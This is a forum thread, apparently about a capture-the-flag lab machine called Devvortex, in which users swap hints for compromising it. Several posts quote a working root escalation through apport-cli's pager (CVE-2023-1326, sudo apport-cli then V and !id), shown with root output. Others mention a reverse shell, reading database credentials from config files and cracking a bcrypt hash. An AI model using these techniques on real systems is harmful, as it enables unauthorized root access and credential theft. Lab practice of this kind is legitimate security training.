Posts: 2
Threads: 0
Joined: Nov 2023
logan@devvortex:~$ sudo apport-cli -c /bin/mysql less
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.............
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
!id
uid=0(root) gid=0(root) groups=0(root)
Posts: 4
Threads: 0
Joined: Oct 2023
Nov 25, 2023, 09:49 PM
(This post was last modified: Nov 25, 2023, 09:53 PM by alialaa.)
ProblemType: Crash
CrashCounter: 1
Date: Wed Feb 9 21:10:31 2023
ExecutablePath: /path/to/application/that/crashed
ProcCmdline: application arguments
ProcEnviron:
SHELL=/bin/bash
PATH=(custom, user)
(Nov 25, 2023, 09:49 PM)alialaa Wrote: ProblemType: Crash
CrashCounter: 1
Date: Wed Feb 9 21:10:31 2023
ExecutablePath: /path/to/application/that/crashed
ProcCmdline: application arguments
ProcEnviron:
SHELL=/bin/bash
PATH=(custom, user)
sudo /usr/bin/apport-cli -c /tmp/xxx.crash
then press v
then press !
Posts: 6
Threads: 0
Joined: Nov 2023
(Nov 25, 2023, 09:29 PM)metrem Wrote: logan@devvortex:~$ sudo apport-cli -c /bin/mysql less
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.............
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
!id
uid=0(root) gid=0(root) groups=0(root)
How did you find out you have to put `less` after the command ?? i couldn't get any hint in the POC as well
Posts: 2
Threads: 0
Joined: Nov 2023
(Nov 26, 2023, 04:47 AM)noobhumein Wrote: (Nov 25, 2023, 09:29 PM)metrem Wrote: logan@devvortex:~$ sudo apport-cli -c /bin/mysql less
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.............
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
!id
uid=0(root) gid=0(root) groups=0(root)
How did you find out you have to put `less` after the command ?? i couldn't get any hint in the POC as well Lucky way 
Posts: 5
Threads: 0
Joined: Nov 2023
Can someone help me ? i got in as www-data but cannot seem to find a way to get to logan. please help me 
Posts: 5
Threads: 0
Joined: Nov 2023
(Nov 26, 2023, 02:51 PM)TheBeast Wrote: Can someone help me ? i got in as www-data but cannot seem to find a way to get to logan. please help me
Me too found logan bcrypt password but i'm not able to decrypt.. i'm on the right way?
Posts: 4
Threads: 0
Joined: Nov 2023
Nov 26, 2023, 04:10 PM
(This post was last modified: Nov 26, 2023, 04:16 PM by NotYourFox.)
so, how do you exactly find the bcrypt from www-data?
i've thought of peeking inside mysql, but I could not get access to the database, tried to login as lewis, and it said access denied for user lewis@ LocalHost
Posts: 7
Threads: 0
Joined: Nov 2023
(Nov 26, 2023, 03:22 PM)SissyGF Wrote: (Nov 26, 2023, 02:51 PM)TheBeast Wrote: Can someone help me ? i got in as www-data but cannot seem to find a way to get to logan. please help me
Me too found logan bcrypt password but i'm not able to decrypt.. i'm on the right way?
I got password from this hash which program / mode do you use?
Posts: 5
Threads: 0
Joined: Nov 2023
(Nov 26, 2023, 04:10 PM)NotYourFox Wrote: so, how do you exactly find the bcrypt from www-data?
i've thought of peeking inside mysql, but I could not get access to the database, tried to login as lewis, and it said access denied for user lewis@LocalHost
via revshell, i login to mysql with credentials found in a conf file 
Posts: 7
Threads: 0
Joined: Nov 2023
(Nov 25, 2023, 08:51 PM)rebelHex Wrote: (Nov 25, 2023, 08:38 PM)take1312 Wrote: rooted.. could have been faster haha
(Nov 25, 2023, 08:37 PM)rebelHex Wrote: did anyone find a POC for this? https://nvd.nist.gov/vuln/detail/CVE-2023-1326
posted it already in this tread.
rooted. fun machine
(Nov 25, 2023, 08:37 PM)rebelHex Wrote: did anyone find a POC for this? https://nvd.nist.gov/vuln/detail/CVE-2023-1326
https://github.com/canonical/apport/comm...0364c48ecb
I used this but instead of using a crash report I just added the name of a program the idea is to get into the pager
https://bugs.launchpad.net/ubuntu/+sourc...ug/2016023
Thank you man. I got rest of this machine preatty easily but was struggling with .crash file.
Whole pwn was like 1.5h and searching for .crash file another 1.5 ... I guess I need to learn to read cmd manual.
|
